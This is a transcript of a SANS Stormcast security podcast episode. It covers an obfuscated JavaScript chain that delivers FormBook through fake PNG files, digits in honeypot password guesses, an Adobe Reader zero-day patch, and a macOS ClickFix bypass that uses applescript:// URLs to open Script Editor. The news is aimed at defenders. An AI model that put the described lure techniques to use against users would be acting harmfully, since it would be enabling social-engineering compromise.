SANS Stormcast Monday, April 13th, 2026: Obfuscated JavaScript; Numbers in Passwords; Adobe Patches 0-Day; ClickFix Fix Bypass

If you are not able to play the podcast using the player below: Use this direct link to the audio file: https://traffic.libsyn.com/securitypodcast/9888.mp3

previous

Obfuscated JavaScript; Numbers in Passwords; Adobe Patches 0-Day; ClickFix Fix Bypass

00:00

iTunes

MP3 Download

RSS Feed

Google

Podbean

Amazon Echo

YouTube

Spreaker

Spotify

Discussion

Login here to join the discussion.

Podcast Transcript

 Hello and welcome to the Monday, April 13, 2026 edition
 of the SANS, Internet Storm Center's Stormcast. My name is
 Johannes Ullrich, recorded today from Stockheim, Germany.
 And this episode is brought to you by the SANS.edu graduate
 certificate program in penetration testing and
 ethical hacking. Got two diaries today to talk about.
 The first one is by Xavier. Xavier did run into an
 interesting piece of JavaScript that ultimately
 dropped a forum book, but had some interesting obfuscation
 quirks. First of all, it did contain 11 megabytes of
 JavaScript. It was really just not used. That JavaScript was
 ASMDB, which is a database of assembly commands, kind of
 with documentation essentially about these assembly commands
 sort of as a JavaScript file. So we're going to be
 meaningless, nothing malicious whatsoever. But then there is
 a little bit of less obfuscated JavaScript that
 will then just download three PNG files. Turns out these PNG
 files are not images in a classical sense, but AS
 encrypted PowerShell scripts that will then download form
 book. So that's the tag chain here in short. If you want to
 look at more details, how to deobfuscate these scripts,
 well then check out Xavier's great diary. And Jesse did a
 very nice and detailed analysis of the use of numbers
 in passwords being attempted against our honeypots. Now,
 the hypothesis behind this was something along the lines of
 users often selecting to add years, like 2026, to their
 password. So maybe attackers are attempting the same thing.
 And that's definitely true. So the most common digits are 0,
 1, 2, 3. In part because of, well, 2, 0, as in 20, is
 currently used in years. Also, of course, the letter 2 then
 in 25 and 26. He did also do a little heat map as to how this
 changed over time. And yes, 2025 was the most common found
 four digit combination last year. It's still very common
 this year, but we are still at the beginning of 2026. And of
 course, attackers don't always update their tools very
 quickly. And that's probably to account for this delay kind
 of in them actually picking up on the password 2026. And of
 course, users also typically don't change all their
 passwords at the beginning of the year. But throughout the
 years, they update the passwords from 2025 to 2026.
 Other common passwords are, of course, things like 1, 2, 3,
 4, 5. And number sequences like this are commonly found
 that are not related to years. And there were a couple sort
 of, I would call them kind of false positives. What often
 happens is that attackers in careless scripts are
 submitting part of their script to the username or
 password field. And then if you have like, for example, a
 command line like ping dash C with a number like an example
 that Jesse found 10,000. Well, that's then going to be picked
 up as a number in a password in this case. So, yep, don't
 use your year or any sort of straight number sequences like
 1, 2, 3, 4, 5 into in your passwords. That's certainly
 something that attackers are looking for. Well, an
 untypical for Adobe. Adobe did release an emergency update
 for Adobe Acrobat Reader. This vulnerability, as became known
 late last week, is already actively being exploited. It's
 a remote code execution vulnerability. So definitely
 something that you must address quickly. The
 vulnerability has so far only been targeting specific
 organizations. So it hasn't been widely exploited. But as
 always, once a patch is released, that, of course,
 starts the race between patching and largest possible
 exploitation effect. So definitely get started on
 patching. Adobe is also expected to release updates on
 Tuesday with the usual patch Tuesday updates. But they
 decided that it's worth the effort here to actually
 release a special updates a couple days earlier and on a
 weekend. And with the last major macOS update, Apple
 released interesting fix for click fix. And what it really
 involved is monitoring what a user may copy paste into
 terminal. Well, according to YAMF, attackers have reacted
 and now came up with another sort of copy paste trick in
 order to bypass this particular countermeasure.
 Instead of copy pasting into terminal, they're now copy
 pasting into the script editor. And apparently this is
 not detected by the current click fix protection that was
 built into the latest macOS. So it comes back down to user
 education on this one and maybe some additional
 detections and monitoring on the endpoints itself in order
 to detect any odd commands from being executed. But this
 one is actually even a little bit easier as Apple makes
 available the Apple script scheme. So any URL starting
 with Apple script colon slash slash will actually
 automatically open script editor. And then the rest of
 the URL will be posted or copied into the script editor.
 So it's actually even a little bit easier to convince a user
 to fall for this than it is with the classic click fix.
 And there was also a minor update for macOS this week or
 end of this week or this weekend. This particular
 update 26.4.1 does not contain any additional security fixes.
 Well, that's it for today. Thanks for listening. Thanks
 for liking. Thanks for subscribing. And talk to you
 again tomorrow. Bye.